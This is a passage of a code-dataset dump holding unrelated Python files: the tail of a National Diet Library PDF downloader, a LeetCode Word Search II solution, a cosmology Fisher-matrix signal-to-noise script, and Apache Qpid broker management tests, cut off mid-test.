params=payload)\r\n\t\t\t\tr.raise_for_status()\r\n\t\t\t\tbreak\r\n\t\t\texcept requests.exceptions.HTTPError:\r\n\t\t\t\tprint(\"Download error. Trying again...\")\r\n\t\t\t\ttime.sleep(waittime)\r\n\t\twith open(filename, \"wb\") as f:\r\n\t\t\tf.write(r.content)\r\n\t\t\tf.closed\r\n\t\tpage = page + downloadlimit\r\n\t\tfilenames.append(filename)\r\n\t\ttime.sleep(waittime)\r\n\tmergepdfs(fulltitle, filenames)\r\n\r\ndef mergepdfs(fulltitle, filenames):\r\n\tfullfilename = u\"{}.pdf\".format(fulltitle)\r\n\tmerger = PdfFileMerger()\r\n\tfor f in filenames:\r\n\t\tmerger.append(PdfFileReader(open(f, \"rb\")))\r\n\tmerger.write(fullfilename)\r\n\tfor d in filenames:\r\n\t\tos.remove(d)\r\n\r\ndef estimate(book_ids, waittime, downloadmode, downloadlimit): #estimate time to download:\r\n\ttotalpages = 0\r\n\tfor i in book_ids:\r\n\t\turl = \"http://dl.ndl.go.jp/info:ndljp/pid/{}\".format(i)\r\n\t\tsoup = BeautifulSoup(requests.get(url).text)\r\n\t\ttitle, volume, fulltitle = gettitle(soup)\r\n\t\tpage, lastpage = getpages(soup)\r\n\t\tprint(\"Number of pages in {0} = {1}\".format(fulltitle, lastpage))\r\n\t\t#print(u\"Number of pages = {0}\".format(next_lastpage)) #for ascii Windows console\r\n\t\ttotalpages += lastpage\r\n\tm, s = divmod((waittime/downloadlimit) * totalpages, 60)\r\n\th, m = divmod(m, 60)\r\n\th = int(h)\r\n\tm = int(m)\r\n\ts = int(s)\r\n\tif h == 1:\r\n\t\thours = \"1 hour\"\r\n\t\tif m > 0 or s > 0: hours += \", \"\r\n\telif h > 1:\r\n\t\thours = \"{} hours\".format(h)\r\n\t\tif m > 0 or s > 0: hours += \", \"\r\n\telse: hours = \"\"\r\n\tif m == 1:\r\n\t\tminutes = \"1 minute\"\r\n\t\tif s > 0: minutes += \", \"\r\n\telif m > 1:\r\n\t\tminutes = \"{} minutes\".format(m)\r\n\t\tif s > 0: minutes += \", \"\r\n\telse: minutes = \"\"\r\n\tif s == 1: seconds = \"1 second\"\r\n\telif s > 1: seconds = \"{} seconds\".format(s)\r\n\telse: seconds = \"\"\r\n\ttotaltime = \"{0}{1}{2}.\".format(hours, minutes, seconds)\r\n\tprint(u\"Total number of volumes = {0}\".format(len(book_ids)))\r\n\tprint(u\"Total number of pages = {0}.\".format(totalpages))\r\n\tprint(u\"Total time to download = {0}\\nContinue with download?\\n(y/n):\".format(totaltime))\r\n\twhile True:\r\n\t\tchoice = input()\r\n\t\tif choice == \"y\" or choice == \"Y\" or choice == \"yes\" or choice == \"YES\":\r\n\t\t\treturn True\r\n\t\telif choice == \"n\" or choice == \"N\" or choice == \"no\" or choice == \"NO\":\r\n\t\t\treturn False\r\n\t\telse: print(u\"Invalid input! Input yes or no.\")\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"ndl_auto_2.0.py","file_name":"ndl_auto_2.0.py","file_ext":"py","file_size_in_byte":10141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"557138246","text":"# https://leetcode.com/problems/word-search-ii/description/\nclass Solution(object):\n def findWords(self, board, words):\n \"\"\"\n :type board: List[List[str]]\n :type words: List[str]\n :rtype: List[str]\n \"\"\"\n trie = {}\n self.result = set()\n self.numRows = len(board)\n self.numCols = len(board[0]) if self.numRows else 0\n self.visited = [[False]*self.numCols for _ in range(self.numRows)]\n self.board = board\n for word in words:\n myNode = trie\n for index, ch in enumerate(word):\n if ch in myNode:\n myNode = myNode[ch]\n else:\n myNode[ch] = {}\n myNode = myNode[ch]\n if index == len(word)-1:\n myNode['END'] = None\n for i, row in enumerate(board):\n for j, ch in enumerate(row):\n if ch in trie:\n self.verify(i,j, trie[ch], [ch])\n return list(self.result)\n\n def verify(self, i, j, node, word):\n self.visited[i][j] = True\n points = [(i+1, j), (i-1, j), (i, j+1), (i, j-1)]\n if 'END' in node:\n self.result.add(''.join(word))\n for x, y in points:\n if x < 0 or x >= self.numRows or y < 0 or y >= self.numCols or self.visited[x][y]:\n continue\n ch = self.board[x][y]\n if ch in node:\n self.verify(x, y, node[ch], word + [ch])\n self.visited[i][j] = False\n","sub_path":"word-search-ii.py","file_name":"word-search-ii.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"519514476","text":"import numpy as np \nimport matplotlib.pyplot as plt\nfrom noise_calculator import *\nfrom scipy.stats import norm\nfrom scipy import optimize\nfrom scipy.special import erfinv\n\nLMAX = 4500\n\nprimary_tt,primary_ee,primary_te = np.loadtxt('./data/primary.dat', usecols=(1,2,4), unpack=True)\ncross_tt,cross_ee,cross_te = np.loadtxt('./data/cross_te_500.dat', usecols=(1,2,4), unpack=True)\ncross_et = np.loadtxt('./data/cross_et_500.dat', usecols=(4), unpack=True)\nauto_tt,auto_ee,auto_te = np.loadtxt('./data/auto_500.dat', usecols=(1,2,4), unpack=True)\n\n## ##\n\ndef _covariance(Experiment,lmax = LMAX):\n \"\"\" Compute the noiseless frequency covariance matrix for a given experiment.\n \"\"\"\n freqs = Experiment.freqs\n N = len(freqs)\n cov = np.zeros((lmax-1,2*N,2*N))\n for i in range(N):\n for j in range(N):\n cov[:,i,j] = (primary_tt + ((freqs[i]/500.)**4 + (freqs[j]/500.)**4)*cross_tt + (freqs[i]/500.)**4 * (freqs[j]/500.)**4 * auto_tt)[:lmax-1]\n cov[:,i+N,j+N] = (primary_ee + ((freqs[i]/500.)**4 + (freqs[j]/500.)**4)*cross_ee + (freqs[i]/500.)**4 * (freqs[j]/500.)**4 * auto_ee)[:lmax-1]\n cov[:,i,j+N] = (primary_te + (freqs[i]/500.)**4*cross_et + (freqs[j]/500.)**4*cross_te + (freqs[i]/500.)**4 * (freqs[j]/500.)**4 * auto_te)[:lmax-1]\n cov[:,i+N,j] = (primary_te + (freqs[i]/500.)**4*cross_te + (freqs[j]/500.)**4*cross_et + (freqs[i]/500.)**4 * (freqs[j]/500.)**4 * auto_te)[:lmax-1]\n return cov\n \ndef _covariance_primary(Experiment,lmax = LMAX):\n \"\"\" Compute the noiseless frequency covariance matrix for a given experiment.\n \"\"\"\n freqs = Experiment.freqs\n N = len(freqs)\n cov_primary = np.zeros((lmax-1,2*N,2*N))\n for i in range(N):\n for j in range(N):\n cov_primary[:,i,j] = primary_tt[:lmax-1]\n cov_primary[:,i+N,j+N] = primary_ee[:lmax-1]\n cov_primary[:,i,j+N] = primary_te[:lmax-1]\n cov_primary[:,i+N,j] = primary_te[:lmax-1]\n return cov_primary\n \ndef _gaussian(x, amplitude, mean, stddev):\n return amplitude * np.exp(-((x - mean) / 2**.5 / stddev)**2)\n \ndef normalize_eigvect(eigvect):\n \"\"\"Normalize the eigenvectors, i.e. make sure all the entries are positive\"\"\"\n norm = np.ones(eigvect.shape)\n lmax = int(eigvect.shape[0])\n N = eigvect.shape[1]\n for ll in range(lmax-1):\n for i in range(N):\n if np.mean(eigvect[ll,:,i])<0 :\n norm[ll,:,i] = - 1.\n return eigvect.copy()/norm\n \n \ndef save_eigvals_eigvects(Experiment, lmax, file, normalize = True):\n \"\"\" Save the two largest eigenvalues and eigenvector entries corresponding to the \n largest eigenvalue to 'file'. Stored as 'ell*(ell+1)/2pi * lambda'. \"\"\"\n cov = _covariance(Experiment, lmax)\n N = len(Experiment.freqs)\n eigvals_T, eigvects_T = np.linalg.eigh(cov[:,:N,:N])\n eigvals_E, eigvects_E = np.linalg.eigh(cov[:,N:,N:])\n \n eigvals_T_save = eigvals_T[:,(-1,-2)]\n eigvals_E_save = eigvals_E[:,(-1,-2)]\n if normalize :\n eigvects_T_save = normalize_eigvect(eigvects_T)[:,:,-1]\n eigvects_E_save = normalize_eigvect(eigvects_E)[:,:,-1]\n else : \n eigvects_T_save = eigvects_T[:,:,-1]\n eigvects_E_save = eigvects_E[:,:,-1]\n np.savetxt(file + 'eigvals_T', eigvals_T_save, header = 'Temperature : lambda_+, lambda_-')\n np.savetxt(file + 'eigvals_E', eigvals_E_save, header = 'E-mode : lambda_+, lambda_-')\n np.savetxt(file + 'eigvects_T', eigvects_T_save, header = 'Temperature, entries to largest eigvest @ {}'.format(Experiment.freqs))\n np.savetxt(file + 'eigvects_E', eigvects_E_save, header = 'E-mode, entries to largest eigvest @ {}'.format(Experiment.freqs))\n\n \ndef estimate_noise_eigvals(cov,Nl):\n \"\"\"\" Estimation of the noise on the different eigenvalues, using an ILC \n (cf Hirata's paper) \"\"\"\n N = int(cov.shape[1]/2)\n lmax = int(cov.shape[0])+1\n \n eigvals_T, eigvects_T = np.linalg.eigh(cov[:,:N,:N])\n eigvals_E, eigvects_E = np.linalg.eigh(cov[:,N:,N:])\n\n A_full = np.zeros((lmax-1,2*N,2*N))\n A_full[:,:N,:N] = eigvects_T\n A_full[:,N:,N:] = eigvects_E\n\n cov_diag_full = np.einsum('lji,ljk,lkm -> lim',A_full,cov,A_full)\n ix = np.ix_([N-1,N-2,-1,-2],[N-1,N-2,-1,-2])\n A = A_full[:,:,[N-1,N-2,-2,-1]]\n N_inv = np.linalg.inv(Nl)\n Nl_best = np.linalg.solve(np.einsum('lia,lij,ljb->lab',A,N_inv,A),np.repeat(np.identity(4)[np.newaxis,:, :], lmax-1, axis=0))\n cov_diag = np.zeros((lmax-1,4,4))\n for ll in range(lmax-1):\n cov_diag[ll,:,:] = cov_diag_full[ll,...][ix]\n return Nl_best,cov_diag\n \ndef eigval_primary(cov,cov_primary):\n \"\"\" Compute the diagonal covmat obtinaed when there is no RS in the covmat \n but we are still looking for it int he ILC.\"\"\"\n N = int(cov.shape[1]/2)\n lmax = int(cov.shape[0])+1\n \n eigvals_T, eigvects_T = np.linalg.eigh(cov[:,:N,:N])\n eigvals_E, eigvects_E = np.linalg.eigh(cov[:,N:,N:])\n\n A_full = np.zeros((lmax-1,2*N,2*N))\n A_full[:,:N,:N] = eigvects_T\n A_full[:,N:,N:] = eigvects_E\n\n cov_diag_full = np.einsum('lji,ljk,lkm -> lim',A_full,cov_primary,A_full)\n ix = np.ix_([N-1,N-2,-1,-2],[N-1,N-2,-1,-2])\n A = A_full[:,:,[N-1,N-2,-2,-1]]\n cov_diag_prim = np.zeros((lmax-1,4,4))\n for ll in range(lmax-1):\n cov_diag_prim[ll,:,:] = cov_diag_full[ll,...][ix]\n return cov_diag_prim\n \ndef get_fisher_eigvals(Experiment,lmax=LMAX):\n \"\"\" Compute the fisher matrix for the 8 non zeros elements of the diagonalized covariance matrix.\n \"\"\"\n ell = np.linspace(2,lmax,lmax-1)\n freqs = Experiment.freqs\n N = len(freqs)\n Nl = Experiment.compute_noise(lmax)\n cov = _covariance(Experiment,lmax)\n Nl_best,cov_diag = estimate_noise_eigvals(cov,Nl)\n inv_cov = np.linalg.solve(cov_diag+Nl_best,np.broadcast_to(np.identity(4),(lmax-1,4,4)))\n elem_list = [[0,0],[1,1],[2,2],[3,3],[0,2],[0,3],[1,2],[1,3]]\n deriv = np.zeros((8,4,4))\n signals = np.zeros((lmax-1,8))\n for kk,elem in enumerate(elem_list):\n ii = elem[0]\n jj = elem[1]\n deriv[kk,ii,jj] = 1.\n deriv[kk,jj,ii] = 1.\n signals[:,kk] = cov_diag[:,jj,ii]\n fisher = Experiment.fsky*np.einsum('l,lij,ajk,lkm,bmi -> lab', (2*ell+1)/2.,inv_cov,deriv,inv_cov,deriv)\n return fisher, signals\n \ndef print_SN(fisher,signals,lmax):\n \"\"\" Print S/N of the eigenvalues, marginalising over the other.\"\"\"\n elem_list = [[0,0],[1,1],[2,2],[3,3],[0,2],[0,3],[1,2],[1,3]]\n labels = ['T1','T2','E1','E2']\n error_cov = np.linalg.inv(fisher)\n for kk,elem in enumerate(elem_list):\n [ii,jj] = elem\n SN2 = signals[:,kk]**2 / error_cov[:,kk,kk]\n SN = SN2.sum()**.5\n print('SN {:s}{:s} : {:3.2f}'.format(labels[ii], labels[jj], SN))\n \n \ndef get_SN_corr(Experiment,lmax):\n \"\"\" Compute the S/N of the correlated RS signal.\"\"\"\n cov = _covariance(Experiment,lmax)\n cov_primary = _covariance_primary(Experiment,lmax)\n fisher, signals = get_fisher_eigvals(Experiment, lmax)\n cov_diag_prim = eigval_primary(cov,cov_primary)\n error_cov = np.linalg.inv(fisher)\n N_steps = 10000\n beta_array = np.linspace(1-2,1+2,N_steps)\n chi_sqr_TT = np.zeros((lmax-1,N_steps))\n chi_sqr_TE = np.zeros((lmax-1,N_steps))\n chi_sqr_EE = np.zeros((lmax-1,N_steps))\n for k,beta in enumerate(beta_array):\n chi_sqr_TT[:,k] = ((signals[:,0] - beta*cov_diag_prim[:,0,0])**2 / error_cov[:,0,0])\n chi_sqr_TE[:,k] = ((np.abs(signals[:,4]) - beta * np.abs(cov_diag_prim[:,0,2]))**2 / error_cov[:,4,4])\n chi_sqr_EE[:,k] = ((signals[:,2] - beta * cov_diag_prim[:,2,2])**2 / error_cov[:,2,2])\n SN2 = np.zeros((3,lmax-1))\n for ll in range(lmax-1):\n loglike_TT = np.exp(-chi_sqr_TT[ll,:])\n loglike_TE = np.exp(-chi_sqr_TE[ll,:])\n loglike_EE = np.exp(-chi_sqr_EE[ll,:])\n popt_TT,_ = optimize.curve_fit(_gaussian,beta_array,loglike_TT,p0=[.5,1.,1.], maxfev=5000)\n popt_TE,_ = optimize.curve_fit(_gaussian,beta_array,loglike_TE,p0=[.5,1.,1.], maxfev=5000)\n popt_EE,_ = optimize.curve_fit(_gaussian,beta_array,loglike_EE,p0=[.5,1.,1.], maxfev=5000)\n# print(popt_TT)\n\n SN2[0,ll] = np.abs(1. - popt_TT[1])/np.abs(popt_TT[2])**2\n SN2[1,ll] = np.abs(1. - popt_TE[1])/np.abs(popt_TE[2])**2\n SN2[2,ll] = np.abs(1. - popt_EE[1])/np.abs(popt_EE[2])**2\n# plt.figure()\n# plt.plot(SN2[0])\n# plt.show()\n\n \n print('Correlated TT : {:3.2f}'.format(SN2[0].sum()**.5))\n print('Correlated TE : {:3.2f}'.format(SN2[1].sum()**.5))\n print('Correlated EE : {:3.2f}'.format(SN2[2].sum()**.5))\n\n\n \ndef plot_all(fisher,signals,lmax,label):\n \"\"\" Plot the 8 non zeros elements of the diagonalized covariance matrix, \n their S/N per mode as well as the cumulative S/N.\"\"\"\n error_cov = np.linalg.inv(fisher)\n labels = ['T1','T2','E1','E2']\n elem_list = [[0,0],[1,1],[2,2],[3,3],[0,2],[0,3],[1,2],[1,3]]\n\n ell = np.linspace(2,lmax,lmax-1)\n for kk,elem in enumerate(elem_list):\n [ii,jj] = elem\n f,[ax1,ax2] = plt.subplots(2,1,sharex = True,gridspec_kw={'height_ratios': [2, 1]},figsize=(10,6))\n plt.subplots_adjust(wspace=0, hspace=0,left=0.1,right=0.9,top = 0.9,bottom=0.1)\n ax1.plot(ell,(signals[:,kk]**2)**.5, c = 'k', lw = 2)\n SN2 = signals[:,kk]**2 / error_cov[:,kk,kk]\n ax_cp = ax1.twinx()\n ax_cp.plot(ell,SN2**.5, c = 'r', ls = 'dashed')\n ax2.plot(ell,(np.cumsum(SN2))**.5, c = 'r')\n ax_cp.tick_params(axis='y', labelcolor='r')\n ax_cp.set_ylabel(r'S/N per mode', fontsize = 14, color='r')\n ax1.set_ylabel(r'',fontsize = 14)\n ax2.set_xlim(2,LMAX)\n ax2.set_ylabel(r'Cumulative S/N', fontsize = 14)\n ax2.set_xlabel(r'$\\ell$', fontsize = 18)\n plt.suptitle('{:s}x{:s}'.format(labels[ii],labels[jj]))\n\n plt.show()\n \nif __name__ == '__main__':\n \n print('PLANCK')\n fisher, signals = get_fisher_eigvals(PLANCK,lmax=2500)\n save_eigvals_eigvects(PLANCK, lmax=2500, file='./data/eigvals/PLANCK', normalize = True)\n ok = ru\n# print_SN(fisher, signals,lmax=2500)\n get_SN_corr(PLANCK,2500)\n print()\n print('SO LAT')\n fisher, signals = get_fisher_eigvals(SO_LAT,lmax=4500)\n# print_SN(fisher, signals,lmax=4500)\n get_SN_corr(SO_LAT,4500)\n print()\n print('CCAT')\n fisher, signals = get_fisher_eigvals(CCAT,lmax=4500)\n# print_SN(fisher, signals,lmax=4500)\n get_SN_corr(CCAT,4500)\n\n\n\n\n \n \n# plot_all(fisher,signals,4500,'SO_LAT')\n \n","sub_path":"RS_SNR_eigvals.py","file_name":"RS_SNR_eigvals.py","file_ext":"py","file_size_in_byte":10560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"436014534","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nfrom __future__ import absolute_import\nfrom qpid.datatypes import Message, RangedSet\nfrom qpid.testlib import TestBase010\nfrom qpid.management import managementChannel, managementClient\nfrom threading import Condition\nfrom time import sleep\nimport qmf.console\nimport qpid.messaging\nfrom qpid.messaging.exceptions import Empty\nfrom qpidtoollibs import BrokerAgent\n\nclass ManagementTest (TestBase010):\n\n def setup_access(self):\n if 'broker_agent' not in self.__dict__:\n self.conn2 = qpid.messaging.Connection(self.broker)\n self.conn2.open()\n self.broker_agent = BrokerAgent(self.conn2)\n return self.broker_agent\n\n \"\"\"\n Tests for the management hooks\n \"\"\"\n\n def test_broker_connectivity_oldAPI (self):\n \"\"\"\n Call the \"echo\" method on the broker to verify it is alive and talking.\n \"\"\"\n session = self.session\n \n mc = managementClient ()\n mch = mc.addChannel (session)\n\n mc.syncWaitForStable (mch)\n brokers = mc.syncGetObjects (mch, \"broker\")\n self.assertEqual (len (brokers), 1)\n broker = brokers[0]\n args = {}\n body = \"Echo Message Body\"\n args[\"body\"] = body\n\n for seq in range (1, 5):\n args[\"sequence\"] = seq\n res = mc.syncCallMethod (mch, broker.id, broker.classKey, \"echo\", args)\n self.assertEqual (res.status, 0)\n self.assertEqual (res.statusText, \"OK\")\n self.assertEqual (res.sequence, seq)\n self.assertEqual (res.body, body)\n mc.removeChannel (mch)\n\n def test_methods_sync (self):\n \"\"\"\n Call the \"echo\" method on the broker to verify it is alive and talking.\n \"\"\"\n session = self.session\n self.startQmf()\n \n brokers = self.qmf.getObjects(_class=\"broker\")\n self.assertEqual(len(brokers), 1)\n broker = brokers[0]\n\n body = \"Echo Message Body\"\n for seq in range(1, 20):\n res = broker.echo(seq, body)\n self.assertEqual(res.status, 0)\n self.assertEqual(res.text, \"OK\")\n self.assertEqual(res.sequence, seq)\n self.assertEqual(res.body, body)\n\n def test_get_objects(self):\n self.startQmf()\n\n # get the package list, verify that the qpid broker package is there\n packages = self.qmf.getPackages()\n assert 'org.apache.qpid.broker' in packages\n\n # get the schema class keys for the broker, verify the broker table and link-down event\n keys = self.qmf.getClasses('org.apache.qpid.broker')\n broker = None\n linkDown = None\n for key in keys:\n if key.getClassName() == \"broker\": broker = key\n if key.getClassName() == \"brokerLinkDown\" : linkDown = key\n assert broker\n assert linkDown\n\n brokerObjs = self.qmf.getObjects(_class=\"broker\")\n assert len(brokerObjs) == 1\n brokerObjs = self.qmf.getObjects(_key=broker)\n assert len(brokerObjs) == 1\n\n def test_self_session_id (self):\n self.startQmf()\n sessionId = self.qmf_broker.getSessionId()\n brokerSessions = self.qmf.getObjects(_class=\"session\")\n\n found = False\n for bs in brokerSessions:\n if bs.name.endswith(sessionId):\n found = True\n self.assertEqual (found, True)\n\n def test_standard_exchanges (self):\n self.startQmf()\n\n exchanges = self.qmf.getObjects(_class=\"exchange\")\n exchange = self.findExchange (exchanges, \"\")\n self.assertEqual (exchange.type, \"direct\")\n exchange = self.findExchange (exchanges, \"amq.direct\")\n self.assertEqual (exchange.type, \"direct\")\n exchange = self.findExchange (exchanges, \"amq.topic\")\n self.assertEqual (exchange.type, \"topic\")\n exchange = self.findExchange (exchanges, \"amq.fanout\")\n self.assertEqual (exchange.type, \"fanout\")\n exchange = self.findExchange (exchanges, \"amq.match\")\n self.assertEqual (exchange.type, \"headers\")\n exchange = self.findExchange (exchanges, \"qpid.management\")\n self.assertEqual (exchange.type, \"topic\")\n\n def findExchange (self, exchanges, name):\n for exchange in exchanges:\n if exchange.name == name:\n return exchange\n return None\n\n def test_move_queued_messages_empty(self):\n \"\"\"\n Test that moving messages from an empty queue does not cause an error.\n \"\"\"\n self.startQmf()\n session = self.session\n \"Set up source queue\"\n session.queue_declare(queue=\"src-queue-empty\", exclusive=True, auto_delete=True)\n\n \"Set up destination queue\"\n session.queue_declare(queue=\"dest-queue-empty\", exclusive=True, auto_delete=True)\n\n queues = self.qmf.getObjects(_class=\"queue\")\n\n \"Move all messages from src-queue-empty to dest-queue-empty\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"src-queue-empty\", \"dest-queue-empty\", 0, {})\n self.assertEqual (result.status, 0) \n\n sq = self.qmf.getObjects(_class=\"queue\", name=\"src-queue-empty\")[0]\n dq = self.qmf.getObjects(_class=\"queue\", name=\"dest-queue-empty\")[0]\n\n self.assertEqual (sq.msgDepth,0)\n self.assertEqual (dq.msgDepth,0)\n\n def test_move_queued_messages(self):\n \"\"\"\n Test ability to move messages from the head of one queue to another.\n Need to test moveing all and N messages.\n \"\"\"\n self.startQmf()\n session = self.session\n \"Set up source queue\"\n session.queue_declare(queue=\"src-queue\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"src-queue\", exchange=\"amq.direct\", binding_key=\"routing_key\")\n\n twenty = range(1,21)\n props = session.delivery_properties(routing_key=\"routing_key\")\n for count in twenty:\n body = \"Move Message %d\" % count\n src_msg = Message(props, body)\n session.message_transfer(destination=\"amq.direct\", message=src_msg)\n\n \"Set up destination queue\"\n session.queue_declare(queue=\"dest-queue\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"dest-queue\", exchange=\"amq.direct\")\n\n queues = self.qmf.getObjects(_class=\"queue\")\n\n \"Move 10 messages from src-queue to dest-queue\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"src-queue\", \"dest-queue\", 10, {})\n self.assertEqual (result.status, 0) \n\n sq = self.qmf.getObjects(_class=\"queue\", name=\"src-queue\")[0]\n dq = self.qmf.getObjects(_class=\"queue\", name=\"dest-queue\")[0]\n\n self.assertEqual (sq.msgDepth,10)\n self.assertEqual (dq.msgDepth,10)\n\n \"Move all remaining messages to destination\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"src-queue\", \"dest-queue\", 0, {})\n self.assertEqual (result.status,0)\n\n sq = self.qmf.getObjects(_class=\"queue\", name=\"src-queue\")[0]\n dq = self.qmf.getObjects(_class=\"queue\", name=\"dest-queue\")[0]\n\n self.assertEqual (sq.msgDepth,0)\n self.assertEqual (dq.msgDepth,20)\n\n \"Use a bad source queue name\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"bad-src-queue\", \"dest-queue\", 0, {})\n self.assertEqual (result.status,4)\n\n \"Use a bad destination queue name\"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"src-queue\", \"bad-dest-queue\", 0, {})\n self.assertEqual (result.status,4)\n\n \" Use a large qty (40) to move from dest-queue back to \"\n \" src-queue- should move all \"\n result = self.qmf.getObjects(_class=\"broker\")[0].queueMoveMessages(\"dest-queue\", \"src-queue\", 40, {})\n self.assertEqual (result.status,0)\n\n sq = self.qmf.getObjects(_class=\"queue\", name=\"src-queue\")[0]\n dq = self.qmf.getObjects(_class=\"queue\", name=\"dest-queue\")[0]\n\n self.assertEqual (sq.msgDepth,20)\n self.assertEqual (dq.msgDepth,0)\n\n \"Consume the messages of the queue and check they are all there in order\"\n session.message_subscribe(queue=\"src-queue\", destination=\"tag\")\n session.message_flow(destination=\"tag\", unit=session.credit_unit.message, value=0xFFFFFFFF)\n session.message_flow(destination=\"tag\", unit=session.credit_unit.byte, value=0xFFFFFFFF)\n queue = session.incoming(\"tag\")\n for count in twenty:\n consumed_msg = queue.get(timeout=1)\n body = \"Move Message %d\" % count\n self.assertEqual(body, consumed_msg.body)\n\n def test_purge_queue(self):\n \"\"\"\n Test ability to purge messages from the head of a queue.\n Need to test moveing all, 1 (top message) and N messages.\n \"\"\"\n self.startQmf()\n session = self.session\n \"Set up purge queue\"\n session.queue_declare(queue=\"purge-queue\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"purge-queue\", exchange=\"amq.direct\", binding_key=\"routing_key\")\n\n twenty = range(1,21)\n props = session.delivery_properties(routing_key=\"routing_key\")\n for count in twenty:\n body = \"Purge Message %d\" % count\n msg = Message(props, body)\n session.message_transfer(destination=\"amq.direct\", message=msg)\n\n pq = self.qmf.getObjects(_class=\"queue\", name=\"purge-queue\")[0]\n\n \"Purge top message from purge-queue\"\n result = pq.purge(1, {})\n self.assertEqual (result.status, 0) \n pq = self.qmf.getObjects(_class=\"queue\", name=\"purge-queue\")[0]\n self.assertEqual (pq.msgDepth,19)\n\n \"Purge top 9 messages from purge-queue\"\n result = pq.purge(9, {})\n self.assertEqual (result.status, 0) \n pq = self.qmf.getObjects(_class=\"queue\", name=\"purge-queue\")[0]\n self.assertEqual (pq.msgDepth,10)\n\n \"Purge all messages from purge-queue\"\n result = pq.purge(0, {})\n self.assertEqual (result.status, 0) \n pq = self.qmf.getObjects(_class=\"queue\", name=\"purge-queue\")[0]\n self.assertEqual (pq.msgDepth,0)\n\n def test_reroute_priority_queue(self):\n self.startQmf()\n session = self.session\n\n #setup test queue supporting multiple priority levels\n session.queue_declare(queue=\"test-queue\", exclusive=True, auto_delete=True, arguments={'x-qpid-priorities':10})\n\n #send some messages of varying priority to that queue:\n for i in range(0, 5):\n deliveryProps = session.delivery_properties(routing_key=\"test-queue\", priority=i+5)\n session.message_transfer(message=Message(deliveryProps, \"Message %d\" % (i+1)))\n\n\n #declare and bind a queue to amq.fanout through which rerouted\n #messages can be verified:\n session.queue_declare(queue=\"rerouted\", exclusive=True, auto_delete=True, arguments={'x-qpid-priorities':10})\n session.exchange_bind(queue=\"rerouted\", exchange=\"amq.fanout\")\n\n #reroute messages from test queue to amq.fanout (and hence to\n #rerouted queue):\n pq = self.qmf.getObjects(_class=\"queue\", name=\"test-queue\")[0]\n result = pq.reroute(0, False, \"amq.fanout\", {})\n self.assertEqual(result.status, 0) \n\n #verify messages are all rerouted:\n self.subscribe(destination=\"incoming\", queue=\"rerouted\")\n incoming = session.incoming(\"incoming\")\n for i in range(0, 5):\n msg = incoming.get(timeout=1)\n self.assertEqual(\"Message %d\" % (5-i), msg.body)\n\n\n def test_reroute_queue(self):\n \"\"\"\n Test ability to reroute messages from the head of a queue.\n Need to test moving all, 1 (top message) and N messages.\n \"\"\"\n self.startQmf()\n session = self.session\n \"Set up test queue\"\n session.exchange_declare(exchange=\"alt.direct1\", type=\"direct\")\n session.queue_declare(queue=\"alt-queue1\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"alt-queue1\", exchange=\"alt.direct1\", binding_key=\"routing_key\")\n session.exchange_declare(exchange=\"alt.direct2\", type=\"direct\")\n session.queue_declare(queue=\"alt-queue2\", exclusive=True, auto_delete=True)\n session.exchange_bind(queue=\"alt-queue2\", exchange=\"alt.direct2\", binding_key=\"routing_key\")\n session.queue_declare(queue=\"reroute-queue\", exclusive=True, auto_delete=True, alternate_exchange=\"alt.direct1\")\n session.exchange_bind(queue=\"reroute-queue\", exchange=\"amq.direct\", binding_key=\"routing_key\")\n\n twenty = range(1,21)\n props = session.delivery_properties(routing_key=\"routing_key\")\n mp = session.message_properties(application_headers={'x-qpid.trace' : 'A,B,C'})\n for count in twenty:\n body = \"Reroute Message %d\" % count\n msg = Message(props, mp, body)\n session.message_transfer(destination=\"amq.direct\", message=msg)\n\n pq = self.qmf.getObjects(_class=\"queue\", name=\"reroute-queue\")[0]\n\n \"Reroute top message from reroute-queue to alternate exchange\"\n result = pq.reroute(1, True, \"\", {})\n self.assertEqual(result.status, 0) \n pq.update()\n aq = self.qmf.getObjects(_class=\"queue\", name=\"alt-queue1\")[0]\n self.assertEqual(pq.msgDepth,19)\n self.assertEqual(aq.msgDepth,1)\n\n \"Verify that the trace was cleared on the rerouted message\"\n url = \"%s://%s:%d\" % (self.broker.scheme or \"amqp\", self.broker.host, self.broker.port or 5672)\n conn = qpid.messaging.Connection(url)\n conn.open()\n sess = conn.session()\n rx = sess.receiver(\"alt-queue1;{mode:browse}\")\n rm = rx.fetch(1)\n self.assertEqual(rm.properties['x-qpid.trace'], '')\n conn.close()\n\n \"Reroute top 9 messages from reroute-queue to alt.direct2\"\n result = pq.reroute(9, False, \"alt.direct2\", {})\n self.assertEqual(result.status, 0) \n pq.update()\n aq = self.qmf.getObjects(_class=\"queue\", name=\"alt-queue2\")[0]\n self.assertEqual(pq.msgDepth,10)\n self.assertEqual(aq.msgDepth,9)\n\n \"Reroute using a non-existent exchange\"\n result = pq.reroute(0, False, \"amq.nosuchexchange\", {})\n self.assertEqual(result.status, 4)\n\n \"Reroute all messages from reroute-queue\"\n result = pq.reroute(0, False, \"alt.direct2\", {})\n self.assertEqual(result.status, 0) \n pq.update()\n aq = self.qmf.getObjects(_class=\"queue\", 